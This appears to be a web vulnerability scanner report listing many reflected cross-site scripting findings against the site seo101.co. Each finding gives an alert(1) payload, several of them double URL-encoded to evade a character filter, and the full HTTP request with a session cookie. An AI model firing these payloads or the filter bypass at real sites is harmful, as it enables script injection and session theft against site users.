The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/favicon.ico5070e%253balert%25281%2529%252f%252fc119c4d5a26 HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... </img/favicon.ico5070e;alert(1)//c119c4d5a26 SEO101 Stats and Site Ranking</title> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ca7d"><script>alert(1)</script>956f69a5f0b was submitted in the REST URL parameter 4. This input was echoed as 6ca7d\"><script>alert(1)</script>956f69a5f0b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/favicon.ico6ca7d"><script>alert(1)</script>956f69a5f0b HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... </img/favicon.ico6ca7d\"><script>alert(1)</script>956f69a5f0b seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3df0</script><script>alert(1)</script>2e02c98ebbf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3Cd3df0</script><script>alert(1)</script>2e02c98ebbf/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/logo.png HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
The value of REST URL parameter 1 is copied into the name of an HTML tag. The payload e7ba4><script>alert(1)</script>dd61f70d1b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3Ce7ba4><script>alert(1)</script>dd61f70d1b3/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/logo.png HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba38e"><script>alert(1)</script>441ae489a28 was submitted in the REST URL parameter 1. This input was echoed as ba38e\"><script>alert(1)</script>441ae489a28 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3Cba38e"><script>alert(1)</script>441ae489a28/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/logo.png HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload bccd2%253balert%25281%2529%252f%252fa9a7bca570b was submitted in the REST URL parameter 2. This input was echoed as bccd2;alert(1)//a9a7bca570b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3Cbccd2%253balert%25281%2529%252f%252fa9a7bca570b/img/logo.png HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... <bccd2;alert(1)//a9a7bca570b/img/logo.png SEO101 Stats and Site Ranking</title> ...[SNIP]...
The value of REST URL parameter 2 is copied into the name of an HTML tag. The payload 952dc><script>alert(1)</script>1dd53549d4e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/952dc><script>alert(1)</script>1dd53549d4e/img/logo.png HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</952dc><script>alert(1)</script>1dd53549d4e/img/logo.png SEO101 Stats and Site Ranking</title> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e66dd"><script>alert(1)</script>e7def84f653 was submitted in the REST URL parameter 2. This input was echoed as e66dd\"><script>alert(1)</script>e7def84f653 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3Ce66dd"><script>alert(1)</script>e7def84f653/img/logo.png HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... <e66dd\"><script>alert(1)</script>e7def84f653/img/logo.png seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afc52"><script>alert(1)</script>c6e04e7bc63 was submitted in the REST URL parameter 3. This input was echoed as afc52\"><script>alert(1)</script>c6e04e7bc63 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/imgafc52"><script>alert(1)</script>c6e04e7bc63/logo.png HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... </imgafc52\"><script>alert(1)</script>c6e04e7bc63/logo.png seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," /> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 4d89d%253balert%25281%2529%252f%252f9276cd50de3 was submitted in the REST URL parameter 3. This input was echoed as 4d89d;alert(1)//9276cd50de3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img4d89d%253balert%25281%2529%252f%252f9276cd50de3/logo.png HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... </img4d89d;alert(1)//9276cd50de3/logo.png SEO101 Stats and Site Ranking</title> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a292"><script>alert(1)</script>8961f3fc872 was submitted in the REST URL parameter 4. This input was echoed as 9a292\"><script>alert(1)</script>8961f3fc872 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/logo.png9a292"><script>alert(1)</script>8961f3fc872 HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... </img/logo.png9a292\"><script>alert(1)</script>8961f3fc872 seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," /> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 15079%253balert%25281%2529%252f%252ff90119d5a01 was submitted in the REST URL parameter 4. This input was echoed as 15079;alert(1)//f90119d5a01 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/logo.png15079%253balert%25281%2529%252f%252ff90119d5a01 HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... </img/logo.png15079;alert(1)//f90119d5a01 SEO101 Stats and Site Ranking</title> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de68d"><script>alert(1)</script>832b0275f9 was submitted in the REST URL parameter 1. This input was echoed as de68d\"><script>alert(1)</script>832b0275f9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3Cde68d"><script>alert(1)</script>832b0275f9/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9da1</script><script>alert(1)</script>c5e7dbceb46 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3Cb9da1</script><script>alert(1)</script>c5e7dbceb46/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
The value of REST URL parameter 1 is copied into the name of an HTML tag. The payload 16416><script>alert(1)</script>e9dfc5f28c3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C16416><script>alert(1)</script>e9dfc5f28c3/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
The value of REST URL parameter 2 is copied into the name of an HTML tag. The payload 8b775><script>alert(1)</script>9a25589bf7e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/8b775><script>alert(1)</script>9a25589bf7e/img/pr/1/pr5.gif HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</8b775><script>alert(1)</script>9a25589bf7e/img/pr/1/pr5.gif SEO101 Stats and Site Ranking</title> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c6d0c%253balert%25281%2529%252f%252f1105b1b95e7 was submitted in the REST URL parameter 2. This input was echoed as c6d0c;alert(1)//1105b1b95e7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3Cc6d0c%253balert%25281%2529%252f%252f1105b1b95e7/img/pr/1/pr5.gif HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... <c6d0c;alert(1)//1105b1b95e7/img/pr/1/pr5.gif SEO101 Stats and Site Ranking</title> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ecddb"><script>alert(1)</script>577e624468a was submitted in the REST URL parameter 2. This input was echoed as ecddb\"><script>alert(1)</script>577e624468a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3Cecddb"><script>alert(1)</script>577e624468a/img/pr/1/pr5.gif HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... <ecddb\"><script>alert(1)</script>577e624468a/img/pr/1/pr5.gif seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," /> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 74406%253balert%25281%2529%252f%252f7d9fcaa0afe was submitted in the REST URL parameter 3. This input was echoed as 74406;alert(1)//7d9fcaa0afe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img74406%253balert%25281%2529%252f%252f7d9fcaa0afe/pr/1/pr5.gif HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... </img74406;alert(1)//7d9fcaa0afe/pr/1/pr5.gif SEO101 Stats and Site Ranking</title> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 180d3"><script>alert(1)</script>c597ac93db1 was submitted in the REST URL parameter 3. This input was echoed as 180d3\"><script>alert(1)</script>c597ac93db1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img180d3"><script>alert(1)</script>c597ac93db1/pr/1/pr5.gif HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... </img180d3\"><script>alert(1)</script>c597ac93db1/pr/1/pr5.gif seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," /> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 9df0e%253balert%25281%2529%252f%252f122f42146bc was submitted in the REST URL parameter 4. This input was echoed as 9df0e;alert(1)//122f42146bc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr9df0e%253balert%25281%2529%252f%252f122f42146bc/1/pr5.gif HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>xss.cxc5cde</title> ...[SNIP]... </img/pr9df0e;alert(1)//122f42146bc/1/pr5.gif SEO101 Stats and Site Ranking</title> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64d84"><script>alert(1)</script>72775ac808d was submitted in the REST URL parameter 4. This input was echoed as 64d84\"><script>alert(1)</script>72775ac808d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr64d84"><script>alert(1)</script>72775ac808d/1/pr5.gif HTTP/1.1 Host: seo101.co Proxy-Connection: keep-alive Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce
